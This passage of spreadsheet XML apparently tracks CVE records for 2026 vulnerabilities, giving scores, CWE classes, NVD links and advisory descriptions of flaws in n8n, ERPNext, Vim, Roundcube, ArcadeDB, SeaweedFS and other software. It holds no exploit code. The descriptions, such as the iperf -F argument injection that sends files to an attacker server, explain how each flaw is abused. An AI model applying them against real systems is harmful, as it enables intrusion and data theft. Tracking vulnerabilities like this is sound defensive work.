        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3218" s="5" t="inlineStr">
        <is>
          <t>n8n before 1.123.67, 2.31.5, and 2.32.1 contains a credential authorization bypass in the HTTP Request node. An authenticated member with edit access to a shared workflow can reference another user's credential while specifying the credential type via an expression. Because the pre-execution permission check compares the unresolved expression instead of the resolved credential type, the ownership check is skipped and the credential is loaded at execution time, allowing the member to use or exfiltrate a credential they were not granted. Exploitation requires knowing the target credential's identifier.</t>
        </is>
      </c>
      <c r="M3218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72774</t>
        </is>
      </c>
    </row>
    <row r="3219">
      <c r="A3219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72838</t>
        </is>
      </c>
      <c r="C3219" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3219" s="5" t="inlineStr"/>
      <c r="F3219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3219" s="5" t="inlineStr"/>
      <c r="H3219" s="5" t="inlineStr"/>
      <c r="I3219" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J3219" s="5" t="inlineStr"/>
      <c r="K3219" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3219" s="5" t="inlineStr">
        <is>
          <t>FileBrowser versions before 2.63.19 fail to enforce the declared Upload-Length in the TUS resumable-upload PATCH endpoint, allowing authenticated users to write arbitrary data to disk. Attackers can send oversized request bodies that exceed the declared upload length to exhaust available disk space and cause service unavailability.</t>
        </is>
      </c>
      <c r="M3219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72838</t>
        </is>
      </c>
    </row>
    <row r="3220">
      <c r="A3220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72909</t>
        </is>
      </c>
      <c r="C3220" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3220" s="5" t="inlineStr"/>
      <c r="F3220" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3220" s="5" t="inlineStr"/>
      <c r="H3220" s="5" t="inlineStr"/>
      <c r="I3220" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3220" s="5" t="inlineStr"/>
      <c r="K3220" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3220" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.112.0 and 16.23.0, the ReceivablePayableReport prepare_conditions path in erpnext/accounts/report/accounts_receivable/accounts_receivable.py does not apply Customer and Supplier user permissions to the Payment Ledger Entry dynamic-link party field, allowing any authenticated user to read unauthorized cross-company financial data in Accounts Receivable and Accounts Payable reports. This issue is fixed in versions 15.112.0 and 16.23.0.</t>
        </is>
      </c>
      <c r="M3220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72909</t>
        </is>
      </c>
    </row>
    <row r="3221">
      <c r="A3221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72910</t>
        </is>
      </c>
      <c r="C3221" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3221" s="5" t="inlineStr"/>
      <c r="F3221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3221" s="5" t="inlineStr"/>
      <c r="H3221" s="5" t="inlineStr"/>
      <c r="I3221" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3221" s="5" t="inlineStr"/>
      <c r="K3221" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3221" s="5" t="inlineStr">
        <is>
          <t>ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.112.0 and 16.22.0, the merge_account, pause_job_for_doc, trigger_job_for_doc, change_release_date, and update_cost_center functions across erpnext/accounts/doctype/account/account.py, erpnext/accounts/doctype/process_payment_reconciliation/process_payment_reconciliation.py, erpnext/accounts/doctype/purchase_invoice/purchase_invoice.py, and erpnext/accounts/utils.py omit required write permission checks, allowing authenticated limited users to modify protected data beyond their roles. This issue is fixed in versions 15.112.0 and 16.22.0.</t>
        </is>
      </c>
      <c r="M3221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72910</t>
        </is>
      </c>
    </row>
    <row r="3222">
      <c r="A3222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73074</t>
        </is>
      </c>
      <c r="C3222" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3222" s="5" t="inlineStr"/>
      <c r="F3222" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3222" s="5" t="inlineStr"/>
      <c r="H3222" s="5" t="inlineStr"/>
      <c r="I3222" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3222" s="5" t="inlineStr"/>
      <c r="K3222" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3222" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0841, prop_add_one() in src/textprop.c uses the proplen value from get_text_props() to increment a uint16_t property count beyond 0xffff, wrapping the count to zero and copying existing text-property records into a heap allocation sized for none of them. This issue is fixed in version 9.2.0841.</t>
        </is>
      </c>
      <c r="M3222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73074</t>
        </is>
      </c>
    </row>
    <row r="3223">
      <c r="A3223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73215</t>
        </is>
      </c>
      <c r="C3223" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3223" s="5" t="inlineStr"/>
      <c r="F3223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3223" s="5" t="inlineStr"/>
      <c r="H3223" s="5" t="inlineStr"/>
      <c r="I3223" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3223" s="5" t="inlineStr"/>
      <c r="K3223" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="L3223" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.17.0, turnports_allocate_even() in src/apps/relay/turn_ports.c marks the unused odd sibling port as TPS_TAKEN_ODD for an EVEN-PORT Allocate request with reservation bit R=0 even though no RTCP socket will release it, allowing an authenticated client to permanently exhaust the relay port pool and cause subsequent allocations to fail with STUN error 508. This issue is fixed in version 4.17.0.</t>
        </is>
      </c>
      <c r="M3223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73215</t>
        </is>
      </c>
    </row>
    <row r="3224">
      <c r="A3224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73266</t>
        </is>
      </c>
      <c r="C3224" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3224" s="5" t="inlineStr"/>
      <c r="F3224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3224" s="5" t="inlineStr"/>
      <c r="H3224" s="5" t="inlineStr"/>
      <c r="I3224" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3224" s="5" t="inlineStr"/>
      <c r="K3224" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L3224" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the clusterclaims-controller component of Multicluster Engine (MCE). An authenticated tenant can exploit this vulnerability by manipulating ClusterClaim labels. This allows the tenant to force a cluster to join a ManagedClusterSet belonging to another tenant. Such unauthorized access could enable the injection of policies and workloads into other tenants' clusters.</t>
        </is>
      </c>
      <c r="M3224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73266</t>
        </is>
      </c>
    </row>
    <row r="3225">
      <c r="A3225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73321</t>
        </is>
      </c>
      <c r="C3225" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3225" s="5" t="inlineStr"/>
      <c r="F3225" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3225" s="5" t="inlineStr"/>
      <c r="H3225" s="5" t="inlineStr"/>
      <c r="I3225" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3225" s="5" t="inlineStr"/>
      <c r="K3225" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L3225" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an uncontrolled recursion vulnerability in the BBCode parser that allows authenticated attackers to cause persistent denial of service by submitting a post with deeply nested BBCode tags. Attackers can craft a single malicious post with sufficient nesting depth to exceed PHP's stack limit, causing fatal errors that repeatedly terminate PHP-FPM workers for all visitors rendering the affected thread.</t>
        </is>
      </c>
      <c r="M3225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t>
        </is>
      </c>
    </row>
    <row r="3226">
      <c r="A3226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73331</t>
        </is>
      </c>
      <c r="C3226" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3226" s="5" t="inlineStr"/>
      <c r="F3226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3226" s="5" t="inlineStr"/>
      <c r="H3226" s="5" t="inlineStr"/>
      <c r="I3226" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3226" s="5" t="inlineStr"/>
      <c r="K3226" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3226" s="5" t="inlineStr">
        <is>
          <t>CamaleonCMS 2.9.1 contains an authenticated SQL injection vulnerability that allows authenticated attackers with post creation or editing privileges to submit a crafted slug value containing SQL syntax that the database backend evaluates as part of an inadequately parameterized query. Attackers can supply malicious slug payloads using boolean- or union-style blind SQL injection techniques to extract sensitive data from the underlying SQLite database, including administrative credentials and configuration values stored in application tables.</t>
        </is>
      </c>
      <c r="M3226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73331</t>
        </is>
      </c>
    </row>
    <row r="3227">
      <c r="A3227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74039</t>
        </is>
      </c>
      <c r="C3227" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3227" s="5" t="inlineStr"/>
      <c r="F3227" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3227" s="5" t="inlineStr"/>
      <c r="H3227" s="5" t="inlineStr"/>
      <c r="I3227" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3227" s="5" t="inlineStr"/>
      <c r="K3227" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-770</t>
        </is>
      </c>
      <c r="L3227" s="5" t="inlineStr">
        <is>
          <t>Wazuh 4.0.0 before 4.14.7 and 5.0.0-beta2 contain a denial of service vulnerability that allows authenticated attackers with allow_run_as enabled to exhaust CPU resources by submitting arbitrarily deeply nested JSON structures to the POST /security/user/authenticate/run_as endpoint. Attackers can repeatedly submit malformed auth_context bodies with unlimited nesting depth to cause the API framework to consume excessive CPU, denying service to all other API consumers.</t>
        </is>
      </c>
      <c r="M3227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74039</t>
        </is>
      </c>
    </row>
    <row r="3228">
      <c r="A3228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74237</t>
        </is>
      </c>
      <c r="C3228" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3228" s="5" t="inlineStr"/>
      <c r="F3228" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3228" s="5" t="inlineStr"/>
      <c r="H3228" s="5" t="inlineStr"/>
      <c r="I3228" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3228" s="5" t="inlineStr"/>
      <c r="K3228" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3228" s="5" t="inlineStr">
        <is>
          <t>GFI Exinda AI and ClearView before 7.6.5 contains an argument injection vulnerability in the Tools Iperf Client functionality. The web_tools_cmd() function constructs an iperf command using the server and options parameters without sanitization, permitting injection of arbitrary iperf flags. An authenticated attacker with Unprivileged (lowest-level) access can supply the iperf -F flag to read an arbitrary file from the system and transmit its contents to an attacker-controlled server.</t>
        </is>
      </c>
      <c r="M3228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74237</t>
        </is>
      </c>
    </row>
    <row r="3229">
      <c r="A3229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74881</t>
        </is>
      </c>
      <c r="C3229" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3229" s="5" t="inlineStr"/>
      <c r="F3229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3229" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H3229" s="5" t="inlineStr">
        <is>
          <t>jahlives:openssl_encrypt</t>
        </is>
      </c>
      <c r="I3229" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3229" s="5" t="inlineStr"/>
      <c r="K3229" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L3229" s="5" t="inlineStr">
        <is>
          <t>openssl_encrypt versions before 1.4.0 configure CORS with allow_origins set to wildcard and allow_credentials enabled to true. Attackers can create malicious websites that make authenticated cross-origin requests to the API on behalf of any user who visits them.</t>
        </is>
      </c>
      <c r="M3229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74881</t>
        </is>
      </c>
    </row>
    <row r="3230">
      <c r="A3230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75002</t>
        </is>
      </c>
      <c r="C3230" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3230" s="5" t="inlineStr"/>
      <c r="F3230" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G3230" s="5" t="inlineStr"/>
      <c r="H3230" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I3230" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3230" s="5" t="inlineStr"/>
      <c r="K3230" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L3230" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, mail search and LITERAL+ byte-count desynchronization could lead to information disclosure or privilege escalation via IMAP command injection.</t>
        </is>
      </c>
      <c r="M3230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75002</t>
        </is>
      </c>
    </row>
    <row r="3231">
      <c r="A3231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75132</t>
        </is>
      </c>
      <c r="C3231" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3231" s="5" t="inlineStr"/>
      <c r="F3231" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3231" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H3231" s="5" t="inlineStr"/>
      <c r="I3231" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3231" s="5" t="inlineStr"/>
      <c r="K3231" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3231" s="5" t="inlineStr">
        <is>
          <t>WAPT Server versions 2.6.1.17834 and earlier contains a SQL injection vulnerability in the `columns` parameter of the GET `/api/v3/hosts` endpoint. A remote authenticated user with read-only privileges can inject arbitrary PostgreSQL expressions into the SQL query constructed by WAPT. By exploiting the injection point, an attacker can inject additional PostgreSQL statements, bypass the host scope restrictions applied to the account, and read information from other rows or tables within the database.</t>
        </is>
      </c>
      <c r="M3231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75132</t>
        </is>
      </c>
    </row>
    <row r="3232">
      <c r="A3232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75369</t>
        </is>
      </c>
      <c r="C3232" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3232" s="5" t="inlineStr"/>
      <c r="F3232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3232" s="5" t="inlineStr"/>
      <c r="H3232" s="5" t="inlineStr"/>
      <c r="I3232" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3232" s="5" t="inlineStr"/>
      <c r="K3232" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3232" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability in the CAN::Application::parsePerformFunctionMessage component of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted CAN message.</t>
        </is>
      </c>
      <c r="M3232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75369</t>
        </is>
      </c>
    </row>
    <row r="3233">
      <c r="A3233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75830</t>
        </is>
      </c>
      <c r="C3233" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3233" s="5" t="inlineStr"/>
      <c r="F3233" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3233" s="5" t="inlineStr"/>
      <c r="H3233" s="5" t="inlineStr"/>
      <c r="I3233" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3233" s="5" t="inlineStr"/>
      <c r="K3233" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3233" s="5" t="inlineStr">
        <is>
          <t>grav-plugi</t>
        </is>
      </c>
      <c r="M3233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75830</t>
        </is>
      </c>
    </row>
    <row r="3234">
      <c r="A3234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75846</t>
        </is>
      </c>
      <c r="C3234" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3234" s="5" t="inlineStr"/>
      <c r="F3234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3234" s="5" t="inlineStr"/>
      <c r="H3234" s="5" t="inlineStr"/>
      <c r="I3234" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3234" s="5" t="inlineStr"/>
      <c r="K3234" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3234" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 (affected versions &lt;= 26.7.3) contains a missing authorization vulnerability in the DELETE FUNCTION SQL statement. DeleteFunctionStatement.executeSimple unregisters and persists deletion of a server-side function without any checkPermissionsOnDatabase (UPDATE_SCHEMA) check. Any user with database access can execute DELETE FUNCTION via the command API (POST /api/v1/command/{db}) to permanently remove any registered server-side function, including security-relevant logic, impacting integrity and availability.</t>
        </is>
      </c>
      <c r="M3234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75846</t>
        </is>
      </c>
    </row>
    <row r="3235">
      <c r="A3235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76223</t>
        </is>
      </c>
      <c r="C3235" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3235" s="5" t="inlineStr"/>
      <c r="F3235" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3235" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3235" s="5" t="inlineStr"/>
      <c r="I3235" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3235" s="5" t="inlineStr"/>
      <c r="K3235" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3235" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB (com.arcadedb) versions 26.7.3 and earlier fail to enforce the UPDATE_SCHEMA permission check when a DEFINE FUNCTION statement targets an already-existing function library. A user with only database access can add or overwrite SQL or Cypher functions in an existing library and persist the change, enabling tampering with admin-defined function logic. The issue is fixed in 26.8.1. (JavaScript functions still trigger the UPDATE_SECURITY check and are not affected.)</t>
        </is>
      </c>
      <c r="M3235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76223</t>
        </is>
      </c>
    </row>
    <row r="3236">
      <c r="A3236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77125</t>
        </is>
      </c>
      <c r="C3236" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3236" s="5" t="inlineStr"/>
      <c r="F3236" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3236" s="5" t="inlineStr"/>
      <c r="H3236" s="5" t="inlineStr"/>
      <c r="I3236" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3236" s="5" t="inlineStr"/>
      <c r="K3236" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3236" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Sonatype Nexus Repository 3 in which two blobstore group management REST API endpoints did not correctly enforce the intended authorization check. A user granted only the nexus:blobstores:create permission could invoke these endpoints to convert an existing blobstore into a group blobstore, an action that should require the nexus:blobstores:update permission instead. This could result in unauthorized modification of blobstore configuration without administrator approval. The nexus:blobstores:create permission is a named permission that must be explicitly granted by an administrator; it is not held by default.</t>
        </is>
      </c>
      <c r="M3236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77125</t>
        </is>
      </c>
    </row>
    <row r="3237">
      <c r="A3237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77611</t>
        </is>
      </c>
      <c r="C3237" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3237" s="5" t="inlineStr"/>
      <c r="F3237" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3237" s="5" t="inlineStr"/>
      <c r="H3237" s="5" t="inlineStr"/>
      <c r="I3237" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3237" s="5" t="inlineStr"/>
      <c r="K3237" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3237" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions prior to 4.40, an authenticated S3 principal with permissions scoped to a nested object key can overwrite a different object outside that scope by calling PutObjectAcl on the key it is allowed to access. The handler authorizes the request against the requested nested key but then writes the updated entry back to the bucket root rather than the key's actual parent directory, so an ACL change on allowed/protected.txt is instead applied to protected.txt at the bucket root. Because the update carries the full entry rather than only ACL metadata, an existing target object is overwritten with the content, metadata, owner information, and ACL of the scoped object, bypassing the object-level action scoping configured through the static S3 identity file. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="M3237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77611</t>
        </is>
      </c>
    </row>
    <row r="3238">
      <c r="A3238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77847</t>
        </is>
      </c>
      <c r="C3238" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3238" s="5" t="inlineStr"/>
      <c r="F3238" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3238" s="5" t="inlineStr"/>
      <c r="H3238" s="5" t="inlineStr"/>
      <c r="I3238" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3238" s="5" t="inlineStr"/>
      <c r="K3238" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3238" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a use of hard-coded credential vulnerability. This could allow an attacker to intercept sensitive information or credentials.</t>
        </is>
      </c>
      <c r="M3238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77847</t>
        </is>
      </c>
    </row>
    <row r="3239">
      <c r="A3239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77939</t>
        </is>
      </c>
      <c r="C3239" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3239" s="5" t="inlineStr"/>
      <c r="F3239" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3239" s="5" t="inlineStr"/>
      <c r="H3239" s="5" t="inlineStr"/>
      <c r="I3239" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3239" s="5" t="inlineStr"/>
      <c r="K3239" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L3239" s="5" t="inlineStr">
        <is>
